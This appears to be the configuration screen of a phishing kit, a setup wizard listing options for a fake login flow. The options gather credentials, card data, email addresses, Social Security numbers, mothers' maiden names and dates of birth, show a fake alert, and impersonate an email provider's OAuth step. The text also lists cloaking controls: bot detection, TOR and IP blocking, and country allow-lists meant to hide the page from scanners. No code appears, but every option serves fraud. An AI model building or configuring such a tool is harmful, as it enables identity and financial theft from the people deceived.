1 Requirements
2 Configuration
3 Complete

Configuration

Basic Configuration

Enables fake alert notification after users input credentials
Choose which alert page to show.
Collects email address information during the process
Skips the initial OAuth confirmation page and goes directly to the email provider page.
Enables Social Security Number collection field
Enables Mother's Maiden Name collection field
Enables Date of Birth collection field

Double Configuration

Requests login credentials twice for verification purposes
Requests card information twice for verification purposes
Requests email verification twice for confirmation
Saves webshop information to the database

Security Blocking

Validates URL parameters to prevent unauthorized access
Uses Blackbox V1 API for basic bot and threat detection (Recommended)
Advanced bot detection with enhanced security (may impact performance)
Validates HTTP headers to detect suspicious requests
Checks IP addresses against known malicious IP databases
Blocks access from TOR network exit nodes
Limits the number of requests from a single IP address
Validates hostnames to detect suspicious connections
Validates browser user-agent strings to detect bots
Verifies browser cookie support and consistency
Validates browser characteristics to detect automation tools
Verifies request origin against allowed domains
Verifies request origin against allowed domains
Restricts access to specified countries only
Enter two-letter ISO country codes separated by commas. Only visitors from these countries will be allowed.
Previous Step